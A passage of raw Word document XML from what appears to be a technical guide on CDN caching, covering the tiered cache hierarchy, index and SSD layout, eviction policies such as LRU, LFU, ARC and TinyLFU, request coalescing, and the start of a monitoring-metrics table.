          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C172F2A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>│      SSD Cache (Warm)        │   1–50 TB per server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2079558C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>│  - Index in RAM              │   Access: 50–200 μs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D395ED" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>│  - Content on SSD            │   Hit ratio: 40–60%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752B9C88" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>│  - LRU/ARC eviction          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2520FBC7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D67CA32" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>│      MISS (Cold)             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C4D641" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>│  - Fetch from upstream       │   Access: 5–200 ms (network to shield/origin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475C3947" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>│  - Triggered by cache miss   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380E4571" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>└─────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168AC211" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Index structure (how the CDN finds content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6443BAA0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1325"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Hash table in RAM: cache_key → {storage_location, size, headers, expiry_time, etag}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155B6BA9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1325"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Fixed-size entries (e.g., 128 bytes per entry).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3DFC92" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1325"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>10 billion objects = ~1.2 TB index RAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380F6680" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1325"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>O(1) lookup for any cache key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DC00E9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content layout on SSD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301BBE44" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1326"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Objects stored in a log-structured format (append-only writes — maximizes SSD write performance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335F0574" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1326"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Small objects (&lt; 8 KB): packed into larger blocks (avoid SSD page amplification).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F61094E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1326"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Large objects (&gt; 1 MB): stored directly, possibly spanning multiple SSD pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AEF132" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1326"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Background compaction: periodically defragments and removes expired/evicted objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A67C84E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.2 Eviction Policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7C3A91" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When the cache is full and a new object needs to be stored, something must be evicted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADFAB88" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LRU (Least Recently Used):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C47EF6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1327"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Evict the object accessed longest ago.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A477544" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1327"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Simple, effective for most workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726A79A2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1327"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Problem: a one-time scan of many objects (bot crawl) pollutes the cache, evicting popular content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C92413" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LFU (Least Frequently Used):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3479E038" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1328"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Evict the object accessed fewest times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429B8CCD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1328"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Better for stable popularity distributions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647560BF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1328"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Problem: "frequency" accumulates over time. An object popular last month but cold now keeps high frequency count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060D7C25" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ARC (Adaptive Replacement Cache):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E605B7A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1329"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Maintains two lists: recency-based and frequency-based.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A22E76" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1329"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Dynamically adjusts their sizes based on workload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DD4839" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1329"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Self-tuning: adapts to both bursty (recency) and stable (frequency) access patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35288701" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TinyLFU (used by modern caches like Caffeine):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECFF219" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1330"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Admission filter: new objects are only cached if their ESTIMATED frequency exceeds the LEAST-frequent currently cached object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A87A6E3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1330"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Prevents cache pollution from scans/one-time access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011A2B69" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1330"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Uses Count-Min Sketch for space-efficient frequency estimation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FFFF8F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN-specific eviction considerations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFBF56D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1331"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cost-aware eviction:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Objects that are expensive to re-fetch (high origin latency, large size) are kept longer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53035227" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1331"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TTL-aware eviction:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Objects near expiry are evicted first (they'd expire soon anyway).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4173903D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1331"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Size-aware eviction:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Evicting one 100 MB object frees space for 1000 × 100 KB objects (more benefit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0971477C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.3 Request Coalescing (Collapse)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D012EC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E72CE63" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Popular object expires. 10,000 concurrent requests arrive before the cache is refilled:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35647FF6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Without coalescing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8DCB98" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C86E25" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>10,000 cache misses → 10,000 origin requests → origin overwhelmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593658E2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How coalescing works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FCAEF8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD123E8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Request 1 arrives, cache miss → lock acquired for this cache key, fetch from origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5B3D85" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Request 2 arrives, cache miss → same key locked → REQUEST QUEUED (don't fetch again)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D53E0AC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Request 3–10,000 arrive → all queued</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DEF9A8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="761C6D55" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Origin responds to request 1 → response cached</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9B44C6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>All 9,999 queued requests → served from fresh cache entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAA332D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="727A179E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin saw: 1 request (not 10,000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E8F32C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implementation details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C5B2AF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1332"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>A lock (or flag) per cache key tracks "fetch in progress."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226492EE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1332"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Waiting requests are held in a queue per key (with a timeout to prevent indefinite waiting).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07658683" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1332"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>If the fetch takes too long (&gt; timeout), waiting requests get an error or are allowed to make their own fetch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE5FF18" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="2D0D540A">
          <v:rect id="_x0000_i4695" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E781BB3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. CDN Monitoring and Observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CB9604" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.1 Key Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D46F82F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Performance metrics: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652"/>
        <w:gridCol w:w="3642"/>
        <w:gridCol w:w="3056"/>
      </w:tblGrid>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="078EB3A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AC1006" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Metric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EF6DDA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>What It Shows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561C76" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="42DEE27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8F173D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Cache hit ratio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7B4584" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Fraction served from cache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26C84C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>&gt; 90%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="0D601FB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A2439E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Time to first byte (TTFB)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090F8B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>How fast the edge responds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A606CF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>&lt; 50ms (hit), &lt; 200ms (miss)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="39AF74D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ACCA1A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Origin response 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D22A7F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>How fast origin serves misses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B54F4A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>&lt; 500ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="59E9C2B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2152D7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
